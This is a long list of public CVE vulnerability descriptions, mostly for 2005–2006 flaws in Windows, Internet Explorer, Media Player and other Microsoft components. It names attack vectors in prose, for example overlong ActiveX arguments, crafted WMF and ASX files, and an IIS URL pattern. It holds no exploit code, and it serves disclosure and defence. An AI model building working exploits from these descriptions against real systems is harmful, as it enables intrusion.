Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating a ADODB.Recordset object and making a series of calls to the NextRecordset method with a long string argument, which causes an "invalid memory access" in the SysFreeString function, a different issue than CVE-2006-3510 and CVE-2006-3899. [CVE-2006-7066] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating an object inside an iframe, deleting the frame by setting its location.href to about:blank, then accessing a property of the object within the deleted frame, which triggers a NULL pointer dereference. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected. [CVE-2006-6902] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows Mobile Pocket PC edition allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6901] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6797] The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory from csrss.exe via crafted arguments to the NtRaiseHardError function with status 0x50000018, a different vulnerability than CVE-2006-6696. [CVE-2006-6753] Event Viewer (eventvwr.exe) in Microsoft Windows does not properly display log data that contains '%' (percent) characters, which might make it impossible to use Event Viewer to determine the actual data that triggered an event, and might produce long strings that are not properly handled by certain processes that rely on Event Viewer. [CVE-2006-6696] Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL. [CVE-2006-6659] The Microsoft Office Outlook Recipient ActiveX control (ole32.dll) in Windows XP SP2 allows remote attackers to cause a denial of service (Internet Explorer 7 hang) via crafted HTML. [CVE-2006-6602] explorer.exe in Windows Explorer 6.00.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a crafted WMV file. [CVE-2006-6601] Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks of (2) time division fields that are set to 0. [CVE-2006-6579] Microsoft Windows XP has weak permissions (FILE_WRITE_DATA and FILE_READ_DATA for Everyone) for %WINDIR%\pchealth\ERRORREP\QHEADLES, which allows local users to write and read files in this folder, as demonstrated by an ASP shell that has write access by IWAM_machine and read access by IUSR_Machine. [CVE-2006-6252] Microsoft Windows Live Messenger 8.0 and earlier, when gestual emoticons are enabled, allows remote attackers to cause a denial of service (CPU consumption) via a long string composed of ":D" sequences, which are interpreted as emoticons. [CVE-2006-6134] Heap-based buffer overflow in the WMCheckURLScheme function in WMVCORE.DLL in Microsoft Windows Media Player (WMP) 10.00.00.4036 on Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long HREF attribute, using an unrecognized protocol, in a REF element in an ASX PlayList file. [CVE-2006-5758] The Graphics Rendering Engine in Microsoft Windows 2000 through 2000 SP4 and Windows XP through SP2 maps GDI Kernel structures on a global shared memory section that is mapped with read-only permissions, but can be remapped by other processes as read-write, which allows local users to cause a denial of service (memory corruption and crash) and gain privileges by modifying the kernel structures. [CVE-2006-5745] Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information. [CVE-2006-5614] Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference. [CVE-2006-5586] The Graphics Rendering Engine in Microsoft Windows 2000 SP4 and XP SP2 allows local users to gain privileges via "invalid application window sizes" in layered application windows, aka the "GDI Invalid Window Size Elevation of Privilege Vulnerability." [CVE-2006-5585] The Client-Server Run-time Subsystem in Microsoft Windows XP SP2 and Server 2003 allows local users to gain privileges via a crafted file manifest within an application, aka "File Manifest Corruption Vulnerability." [CVE-2006-5584] The Remote Installation Service (RIS) in Microsoft Windows 2000 SP4 uses a TFTP server that allows anonymous access, which allows remote attackers to upload and overwrite arbitrary files to gain privileges on systems that use RIS. [CVE-2006-5583] Buffer overflow in the SNMP Service in Microsoft Windows 2000 SP4, XP SP2, Server 2003, Server 2003 SP1, and possibly other versions allows remote attackers to execute arbitrary code via a crafted SNMP packet, aka "SNMP Memory Corruption Vulnerability." [CVE-2006-5448] The drmstor.dll ActiveX object in Microsoft Windows Digital Rights Management System (DRM) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long parameter to the StoreLicense function, which triggers "memory corruption" and possibly a buffer overflow. [CVE-2006-5270] Integer overflow in the Microsoft Malware Protection Engine (mpengine.dll), as used by Windows Live OneCare, Antigen, Defender, and Forefront Security, allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file. [CVE-2006-5028] Directory traversal vulnerability in filemanager/filemanager.php in SWsoft Plesk 7.5 Reload and Plesk 7.6 for Microsoft Windows allows remote attackers to list arbitrary directories via a ../ (dot dot slash) in the file parameter in a chdir action. [CVE-2006-4868] Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag. [CVE-2006-4702] Buffer overflow in the Windows Media Format Runtime in Microsoft Windows Media Player (WMP) 6.4 and Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2006-4696] Unspecified vulnerability in the Server service in Microsoft Windows 2000 SP4, Server 2003 SP1 and earlier, and XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted packet, aka "SMB Rename Vulnerability." [CVE-2006-4694] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and Exploit-PPT.d/Trojan.PPDropper.F. NOTE: it has been reported that the attack vector involves SlideShowWindows.View.GotoNamedShow. [CVE-2006-4692] Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a "/" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka "Object Packager Dialogue Spoofing Vulnerability." [CVE-2006-4689] Unspecified vulnerability in the driver for the Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to cause a denial of service (hang and reboot) via has unknown attack vectors, aka "NetWare Driver Denial of Service Vulnerability." [CVE-2006-4688] Buffer overflow in Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via crafted messages, aka "Client Service for NetWare Memory Corruption Vulnerability." [CVE-2006-4495] Microsoft Internet Explorer allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Windows 2000 ActiveX COM Objects including (1) ciodm.dll, (2) myinfo.dll, (3) msdxm.ocx, and (4) creator.dll. [CVE-2006-4219] The Terminal Services COM object (tsuserex.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by instantiating it as an ActiveX object in Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN. [CVE-2006-4138] Multiple unspecified vulnerabilities in Microsoft Windows Help File viewer (winhlp32.exe) allow user-assisted attackers to execute arbitrary code via crafted HLP files. [CVE-2006-4128] Multiple heap-based buffer overflows in Symantec VERITAS Backup Exec for Netware Server Remote Agent for Windows Server 9.1 and 9.2 (all builds), Backup Exec Continuous Protection Server Remote Agent for Windows Server 10.1 (builds 10.1.325.6301, 10.1.326.1401, 10.1.326.2501, 10.1.326.3301, and 10.1.327.401), and Backup Exec for Windows Server and Remote Agent 9.1 (build 9.1.4691), 10.0 (builds 10.0.5484 and 10.0.5520), and 10.1 (build 10.1.5629) allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted RPC message. [CVE-2006-4071] Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file. [CVE-2006-4066] The Graphical Device Interface Plus library (gdiplus.dll) in Microsoft Windows XP SP2 allows context-dependent attackers to cause a denial of service (application crash) via certain images that trigger a divide-by-zero error, as demonstrated by a (1) .ico file, (2) .png file that crashes MSN Messenger, and (3) .jpg file that crashes Internet Explorer. NOTE: another researcher has not been able to reproduce this issue. [CVE-2006-3992] Unspecified vulnerability in the Centrino (1) w22n50.sys, (2) w22n51.sys, (3) w29n50.sys, and (4) w29n51.sys Microsoft Windows drivers for Intel 2200BG and 2915ABG PRO/Wireless Network Connection before 10.5 with driver 9.0.4.16 allows remote attackers to execute arbitrary code via certain frames that trigger memory corruption. [CVE-2006-3944] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via a (1) Forms.ListBox.1 or (2) Forms.ListBox.1 object with the ListWidth property set to (a) 0x7fffffff, which triggers an integer overflow exception, or to (b) 0x7ffffffe, which triggers a null dereference. [CVE-2006-3943] Stack-based buffer overflow in NDFXArtEffects in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via long (1) RGBExtraColor, (2) RGBForeColor, and (3) RGBBackColor properties. [CVE-2006-3942] The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an SMB_COM_TRANSACTION SMB message that contains a string without null character termination, which leads to a NULL dereference in the ExecuteTransaction function, possibly related to an "SMB PIPE," aka the "Mailslot DOS" vulnerability. NOTE: the name "Mailslot DOS" was derived from incomplete initial research [CVE-2006-3915] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by iterating over any native function, as demonstrated with the window.alert function, which triggers a null dereference. [CVE-2006-3899] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the stringToBinary function of the CEnroll.CEnroll.2 ActiveX object with a long second argument, which triggers an invalid memory access inside the SysAllocStringLen function. [CVE-2006-3898] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the Click method of the Internet.HHCtrl.1 ActiveX object before initializing the URL, which triggers a null dereference. [CVE-2006-3897] Stack overflow in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (application crash) by creating an NMSA.ASFSourceMediaDescription.1 ActiveX object with a long dispValue property. [CVE-2006-3880] DISPUTED Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Small Business Server 2003 allow remote attackers to cause a denial of service (IP stack hang) via a continuous stream of packets on TCP port 135 that have incorrect TCP header checksums and random numbers in certain TCP header fields, as demonstrated by the Achilles Windows Attack Tool. NOTE: the researcher reports that the Microsoft Security Response Center has stated "Our investigation which has included code review, review of the TCPDump, and attempts on reproing the issue on multiple fresh installs of various Windows Operating Systems have all resulted in non confirmation." [CVE-2006-3873] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060912, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL in a GZIP-encoded website that was the target of an HTTP redirect, due to an incomplete fix for CVE-2006-3869. [CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL on a website that uses HTTP 1.1 compression. [CVE-2006-3730] Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy. [CVE-2006-3648] Unspecified vulnerability in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 and 2003 SP1, allows remote attackers to execute arbitrary code via unspecified vectors involving unhandled exceptions, memory resident applications, and incorrectly "unloading chained exception." [CVE-2006-3643] Cross-site scripting (XSS) vulnerability in Internet Explorer 5.01 and 6 in Microsoft Windows 2000 SP4 permits access to local "HTML-embedded resource files" in the Microsoft Management Console (MMC) library, which allows remote authenticated users to execute arbitrary commands, aka "MMC Redirect Cross-Site Scripting Vulnerability." [CVE-2006-3510] The Remote Data Service Object (RDS.DataControl) in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (crash) via a series of operations that result in an invalid length calculation when using SysAllocStringLen, then triggers a buffer over-read. [CVE-2006-3471] Microsoft Internet Explorer 6 on Windows XP allows remote attackers to cause a denial of service (crash) via a table with a frameset as a child, which triggers a null dereference, as demonstrated using the appendChild method. [CVE-2006-3448] Buffer overflow in the Step-by-Step Interactive Training in Microsoft Windows 2000 SP4, XP SP2 and Professional, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a long Syllabus string in crafted bookmark link files (cbo, cbl, or .cbm), a different issue than CVE-2005-1212. [CVE-2006-3445] Integer overflow in the ReadWideString function in agentdpv.dll in Microsoft Agent on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a large length value in an .ACF file, which results in a heap-based buffer overflow. [CVE-2006-3444] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, probably a buffer overflow, allows local users to obtain privileges via unspecified vectors involving an "unchecked buffer." [CVE-2006-3443] Untrusted search path vulnerability in Winlogon in Microsoft Windows 2000 SP4, when SafeDllSearchMode is disabled, allows local users to gain privileges via a malicious DLL in the UserProfile directory, aka "User Profile Elevation of Privilege Vulnerability." [CVE-2006-3442] Unspecified vulnerability in Pragmatic General Multicast (PGM) in Microsoft Windows XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted multicast message. [CVE-2006-3441] Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. NOTE: while MS06-041 implies that there is a single issue, there are multiple vectors, and likely multiple vulnerabilities, related to (1) a heap-based buffer overflow in a DNS server response to the client, (2) a DNS server response with malformed ATMA records, and (3) a length miscalculation in TXT, HINFO, X25, and ISDN records. [CVE-2006-3440] Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability." [CVE-2006-3209] DISPUTED The Task scheduler (at.exe) on Microsoft Windows XP spawns each scheduled process with SYSTEM permissions, which allows local users to gain privileges. NOTE: this issue has been disputed by third parties, who state that the Task scheduler is limited to the Administrators group by default upon installation. [CVE-2006-2766] Buffer overflow in INETCOMM.DLL, as used in Microsoft Internet Explorer 6.0 through 6.0 SP2, Windows Explorer, Outlook Express 6, and possibly other programs, allows remote user-assisted attackers to cause a denial of service (application crash) via a long mhtml URI in the URL value in a URL file. [CVE-2006-2386] Unspecified vulnerability in Microsoft Outlook Express 6 and earlier allows remote attackers to execute arbitrary code via a crafted contact record in a Windows Address Book (WAB) file. [CVE-2006-2379] Buffer overflow in the TCP/IP Protocol driver in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via unknown vectors related to IP source routing. [CVE-2006-2378] Buffer overflow in the ART Image Rendering component (jgdw400.dll) in Microsoft Windows XP SP1 and Sp2, Server 2003 SP1 and earlier, and Windows 98 and Me allows remote attackers to execute arbitrary code via a crafted ART image that causes heap corruption. [CVE-2006-2376] Integer overflow in the PolyPolygon function in Graphics Rendering Engine on Microsoft Windows 98 and Me allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) or EMF image with a sum of entries in the vertext counts array and number of polygons that triggers a heap-based buffer overflow. [CVE-2006-2374] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to cause a denial of service (hang) by calling the MrxSmbCscIoctlCloseForCopyChunk with the file handle of the shadow device, which results in a deadlock, aka the "SMB Invalid Handle Vulnerability." [CVE-2006-2373] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to execute arbitrary code by calling the MrxSmbCscIoctlOpenForCopyChunk function with the METHOD_NEITHER method flag and an arbitrary address, possibly for kernel memory, aka the "SMB Driver Elevation of Privilege Vulnerability." [CVE-2006-2372] Buffer overflow in the DHCP Client service for Microsoft Windows 2000 SP4, Windows XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a crafted DHCP response. [CVE-2006-2334] The RtlDosPathNameToNtPathName_U API function in NTDLL.DLL in Microsoft Windows 2000 SP4 and XP SP2 does not properly convert DOS style paths with trailing spaces into NT style paths, which allows context-dependent attackers to create files that cannot be accessed through the expected DOS path or prevent access to other similarly named files in the same directory, which prevents those files from being detected or disinfected by certain anti-virus and anti-spyware software. [CVE-2006-2218] Unspecified vulnerability in Internet Explorer 6.0 on Microsoft Windows XP SP2 allows remote attackers to execute arbitrary code via "exceptional conditions" that trigger memory corruption, as demonstrated using an exception handler and nested object tags, a variant of CVE-2006-1992. [CVE-2006-2094] Microsoft Internet Explorer before Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, when Prompt is configured in Security Settings, uses modal dialogs to verify that a user wishes to run an ActiveX control or perform other risky actions, which allows user-assisted remote attackers to construct a race condition that tricks a user into clicking an object or pressing keys that are actually applied to a "Yes" approval for executing the control. [CVE-2006-2056] Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1654] Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. [CVE-2006-1651] DISPUTED Microsoft ISA Server 2004 allows remote attackers to bypass certain filtering rules, including ones for (1) ICMP and (2) TCP, via IPv6 packets. NOTE: An established researcher has disputed this issue, saying that "Neither ISA Server 2004 nor Windows 2003 Basic Firewall support IPv6 filtering ... This is different network protocol." [CVE-2006-1591] Heap-based buffer overflow in Microsoft Windows Help winhlp32.exe allows user-assisted attackers to execute arbitrary code via crafted embedded image data in a .hlp file. [CVE-2006-1510] Buffer overflow in calloc.c in the Microsoft Windows XP SP2 ntdll.dll system library, when used by the ILDASM disassembler in the Microsoft .NET 1.0 and 1.1 SDK, might allow user-assisted attackers to execute arbitrary code via a crafted .dll file with a large static method. [CVE-2006-1476] Windows Firewall in Microsoft Windows XP SP2 produces incorrect application block alerts when the application filename is ".exe" (with no characters before the "."), which might allow local user-assisted users to trick a user into unblocking a Trojan horse program, as demonstrated by a malicious ".exe" program in a folder named "Internet Explorer," which triggers a question about whether to unblock the "Internet Explorer" program. [CVE-2006-1475] Windows Firewall in Microsoft Windows XP SP2 does not produce application alerts when an application is executed using the NTFS Alternate Data Streams (ADS) filename:stream syntax, which might allow local users to launch a Trojan horse attack in which the victim does not obtain the alert that Windows Firewall would have produced for a non-ADS file. [CVE-2006-1315] The Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to obtain sensitive information via crafted requests that leak information in SMB buffers, which are not properly initialized, aka "SMB Information Disclosure Vulnerability." [CVE-2006-1314] Heap-based buffer overflow in the Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to execute arbitrary code via crafted first-class Mailslot messages that triggers memory corruption and bypasses size restrictions on second-class Mailslot messages. [CVE-2006-1313] Microsoft JScript 5.1, 5.5, and 5.6 on Windows 2000 SP4, and 5.6 on Windows XP, Server 2003, Windows 98 and Windows Me, will "release objects early" in certain cases, which results in memory corruption and allows remote attackers to execute arbitrary code. [CVE-2006-1311] The RichEdit component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 [CVE-2006-1300] Microsoft .NET framework 2.0 (ASP.NET) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to bypass access restrictions via unspecified "URL paths" that can access Application Folder objects "explicitly by name." [CVE-2006-1184] Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0, 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to cause a denial of service (crash) via a BuildContextW request with a large (1) UuidString or (2) GuidIn of a certain length, which causes an out-of-range memory access, aka the MSDTC Denial of Service Vulnerability. NOTE: this is a variant of CVE-2005-2119. [CVE-2006-0988] The default configuration of the DNS Server service on Windows Server 2003 and Windows 2000, and the Microsoft DNS Server service on Windows NT 4.0, allows recursive queries and provides additional delegation information to arbitrary IP addresses, which allows remote attackers to cause a denial of service (traffic amplification) via DNS queries with spoofed source IP addresses. [CVE-2006-0753] Memory leak in Microsoft Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to cause a denial of service (memory consumption) via JavaScript that uses setInterval to repeatedly call a function to set the value of window.status. [CVE-2006-0561] Cisco Secure Access Control Server (ACS) 3.x for Windows stores ACS administrator passwords and the master key in the registry with insecure permissions, which allows local users and remote administrators to decrypt the passwords by using Microsoft's cryptographic API functions to obtain the plaintext version of the master key. [CVE-2006-0143] Microsoft Windows Graphics Rendering Engine (GRE) allows remote attackers to corrupt memory and cause a denial of service (crash) via a WMF file containing (1) ExtCreateRegion or (2) ExtEscape function calls with arguments with inconsistent lengths. [CVE-2006-0032] Cross-site scripting (XSS) vulnerability in the Indexing Service in Microsoft Windows 2000, XP, and Server 2003, when the Encoding option is set to Auto Select, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL, which is injected into an error message whose charset is set to UTF-7. [CVE-2006-0025] Stack-based buffer overflow in Microsoft Windows Media Player 9 and 10 allows remote attackers to execute arbitrary code via a PNG image with a large chunk size. [CVE-2006-0023] Microsoft Windows XP SP1 and SP2 before August 2004, and possibly other operating systems and versions, uses insecure default ACLs that allow the Authenticated Users group to gain privileges by modifying critical configuration information for the (1) Simple Service Discovery Protocol (SSDP), (2) Universal Plug and Play Device Host (UPnP), (3) NetBT, (4) SCardSvr, (5) DHCP, and (6) DnsCache services, aka "Permissive Windows Services DACLs." NOTE: the NetBT, SCardSvr, DHCP, DnsCache already require privileged access to exploit. [CVE-2006-0021] Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability." [CVE-2006-0020] An unspecified Microsoft WMF parsing application, as used in Internet Explorer 5.01 SP4 on Windows 2000 SP4, and 5.5 SP2 on Windows Millennium, and possibly other versions, allows attackers to cause a denial of service (crash) and possibly execute code via a crafted WMF file with a manipulated WMF header size, possibly involving an integer overflow, a different vulnerability than CVE-2005-4560, and aka "WMF Image Parsing Memory Corruption Vulnerability." [CVE-2006-0014] Buffer overflow in Microsoft Outlook Express 5.5 and 6 allows remote attackers to execute arbitrary code via a crafted Windows Address Book (WAB) file containing "certain Unicode strings" and modified length values. [CVE-2006-0012] Unspecified vulnerability in Windows Explorer in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via attack vectors involving COM objects and "crafted files and directories," aka the "Windows Shell Vulnerability." [CVE-2006-0010] Heap-based buffer overflow in T2EMBED.DLL in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1, Windows 98, and Windows ME allows remote attackers to execute arbitrary code via an e-mail message or web page with a crafted Embedded Open Type (EOT) web font that triggers the overflow during decompression. [CVE-2006-0008] The ShellAbout API call in Korean Input Method Editor (IME) in Korean versions of Microsoft Windows XP SP1 and SP2, Windows Server 2003 up to SP1, and Office 2003, allows local users to gain privileges by launching the "shell about dialog box" and clicking the "End-User License Agreement" link, which executes Notepad with the privileges of the program that displays the about box. [CVE-2006-0006] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data. [CVE-2006-0005] Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a long src attribute. [CVE-2005-4717] Microsoft Internet Explorer 6.0 on Windows NT 4.0 SP6a, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, and Windows Server 2003 SP1 allows remote attackers to cause a denial of service (client crash) via a certain combination of a malformed HTML file and a CSS file that triggers a null dereference, probably related to rendering of a DIV element that contains a malformed IMG tag, as demonstrated by IEcrash.htm and IEcrash.rar. [CVE-2005-4560] The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com. [CVE-2005-4360] The URL parser in Microsoft Internet Information Services (IIS) 5.1 on Windows XP Professional SP2 allows remote attackers to execute arbitrary code via multiple requests to ".dll" followed by arguments such as "~0" through "~9", which causes ntdll.dll to produce a return value that is not correctly handled by IIS, as demonstrated using "/_vti_bin/.dll//~0". NOTE: the consequence was originally believed to be only a denial of service (application crash and reboot). [CVE-2005-4269] mshtml.dll in Microsoft Windows XP, Server 2003, and Internet Explorer 6.0 SP1 allows attackers to cause a denial of service (access violation) by causing mshtml.dll to process button-focus events at the same time that a document is reloading, as seen in Microsoft Office InfoPath 2003 by repeatedly clicking the "Delete" button in a repeating section in a form. NOTE: the normal operation of InfoPath appears to involve a local user without any privilege boundaries, so this might not be a vulnerability in InfoPath. If no realistic scenarios exist for this problem in other products, then perhaps it should be excluded from CVE. [CVE-2005-3981] * DISPUTED NOTE: this issue has been disputed by third parties. Microsoft Windows XP, 2000, and 2003 allows local users to kill a writable process by using the CreateRemoteThread function with certain arguments on a process that has been opened using the OpenProcess function, possibly involving an invalid address for the start routine. NOTE: followup posts have disputed this issue, saying that if a user already has privileges to write to a process, then other functions could be called or the process could be terminated using PROCESS_TERMINATE. [CVE-2005-3945] The SynAttackProtect protection in Microsoft Windows 2003 before SP1 and Windows 2000 before SP4 with Update Roll-up uses a hash of predictable data, which allows remote attackers to cause a denial of service (CPU consumption) via a flood of SYN packets that produce identical hash values, which slows down the hash table lookups. [CVE-2005-3595] By default Microsoft Windows XP Home Edition installs with a blank password for the Administrator account, which allows remote attackers to gain control of the computer. [CVE-2005-3177] CHKDSK in Microsoft Windows 2000 before Update Rollup 1 for SP4, Windows XP, and Windows Server 2003, when running in fix mode, does not properly handle security descriptors if the master file table contains a large number of files or if the descriptors do not satisfy certain NTFS conventions, which could cause ACLs for some files to be reverted to less secure defaults, or cause security descriptors to be removed. [CVE-2005-3176] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not record the IP address of a Windows Terminal Services client in a security log event if the client connects successfully, which could make it easier for attackers to escape detection. [CVE-2005-3175] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows a local administrator to unlock a computer even if it has been locked by a domain administrator, which allows the local administrator to access the session as the domain administrator. [CVE-2005-3174] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows users to log on to the domain, even when their password has expired, if the fully qualified domain name (FQDN) is 8 characters long. [CVE-2005-3173] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not apply group policies if the user logs on using UPN credentials with a trailing dot, which prevents Windows 2000 from finding the correct domain controller and could allow the user to bypass intended restrictions. [CVE-2005-3172] The WideCharToMultiByte function in Microsoft Windows 2000 before Update Rollup 1 for SP4 does not properly convert strings with Japanese composite characters in the last character, which could prevent the string from being null terminated and lead to data corruption or enable buffer overflow attacks. [CVE-2005-3171] Microsoft Windows 2000 before Update Rollup 1 for SP4 records Event ID 1704 to indicate that Group Policy security settings were successfully updated, even when the processing fails such as when Ntuser.pol cannot be accessed, which could cause system administrators to believe that the system is compliant with the specified settings. [CVE-2005-3170] The LDAP client on Microsoft Windows 2000 before Update Rollup 1 for SP4 accepts certificates using LDAP Secure Sockets Layer (LDAPS) even when the Certificate Authority (CA) is not trusted, which could allow attackers to trick users into believing that they are accessing a trusted site. [CVE-2005-3169] Microsoft Windows 2000 before Update Rollup 1 for SP4, when the "audit directory service access" policy is enabled, does not record a 565 event message for File Delete Child operations on an Active Directory object in the security event log, which could allow attackers to conduct unauthorized activities without detection. [CVE-2005-3168] The SECEDIT command on Microsoft Windows 2000 before Update Rollup 1 for SP4, when using a security template to set Access Control Lists (ACLs) on folders, does not apply ACLs on folders that are listed after a long folder entry, which could result in less secure permissions than specified by the template. [CVE-2005-2940] Unquoted Windows search path vulnerability in Microsoft Antispyware 1.0.509 (Beta 1) might allow local 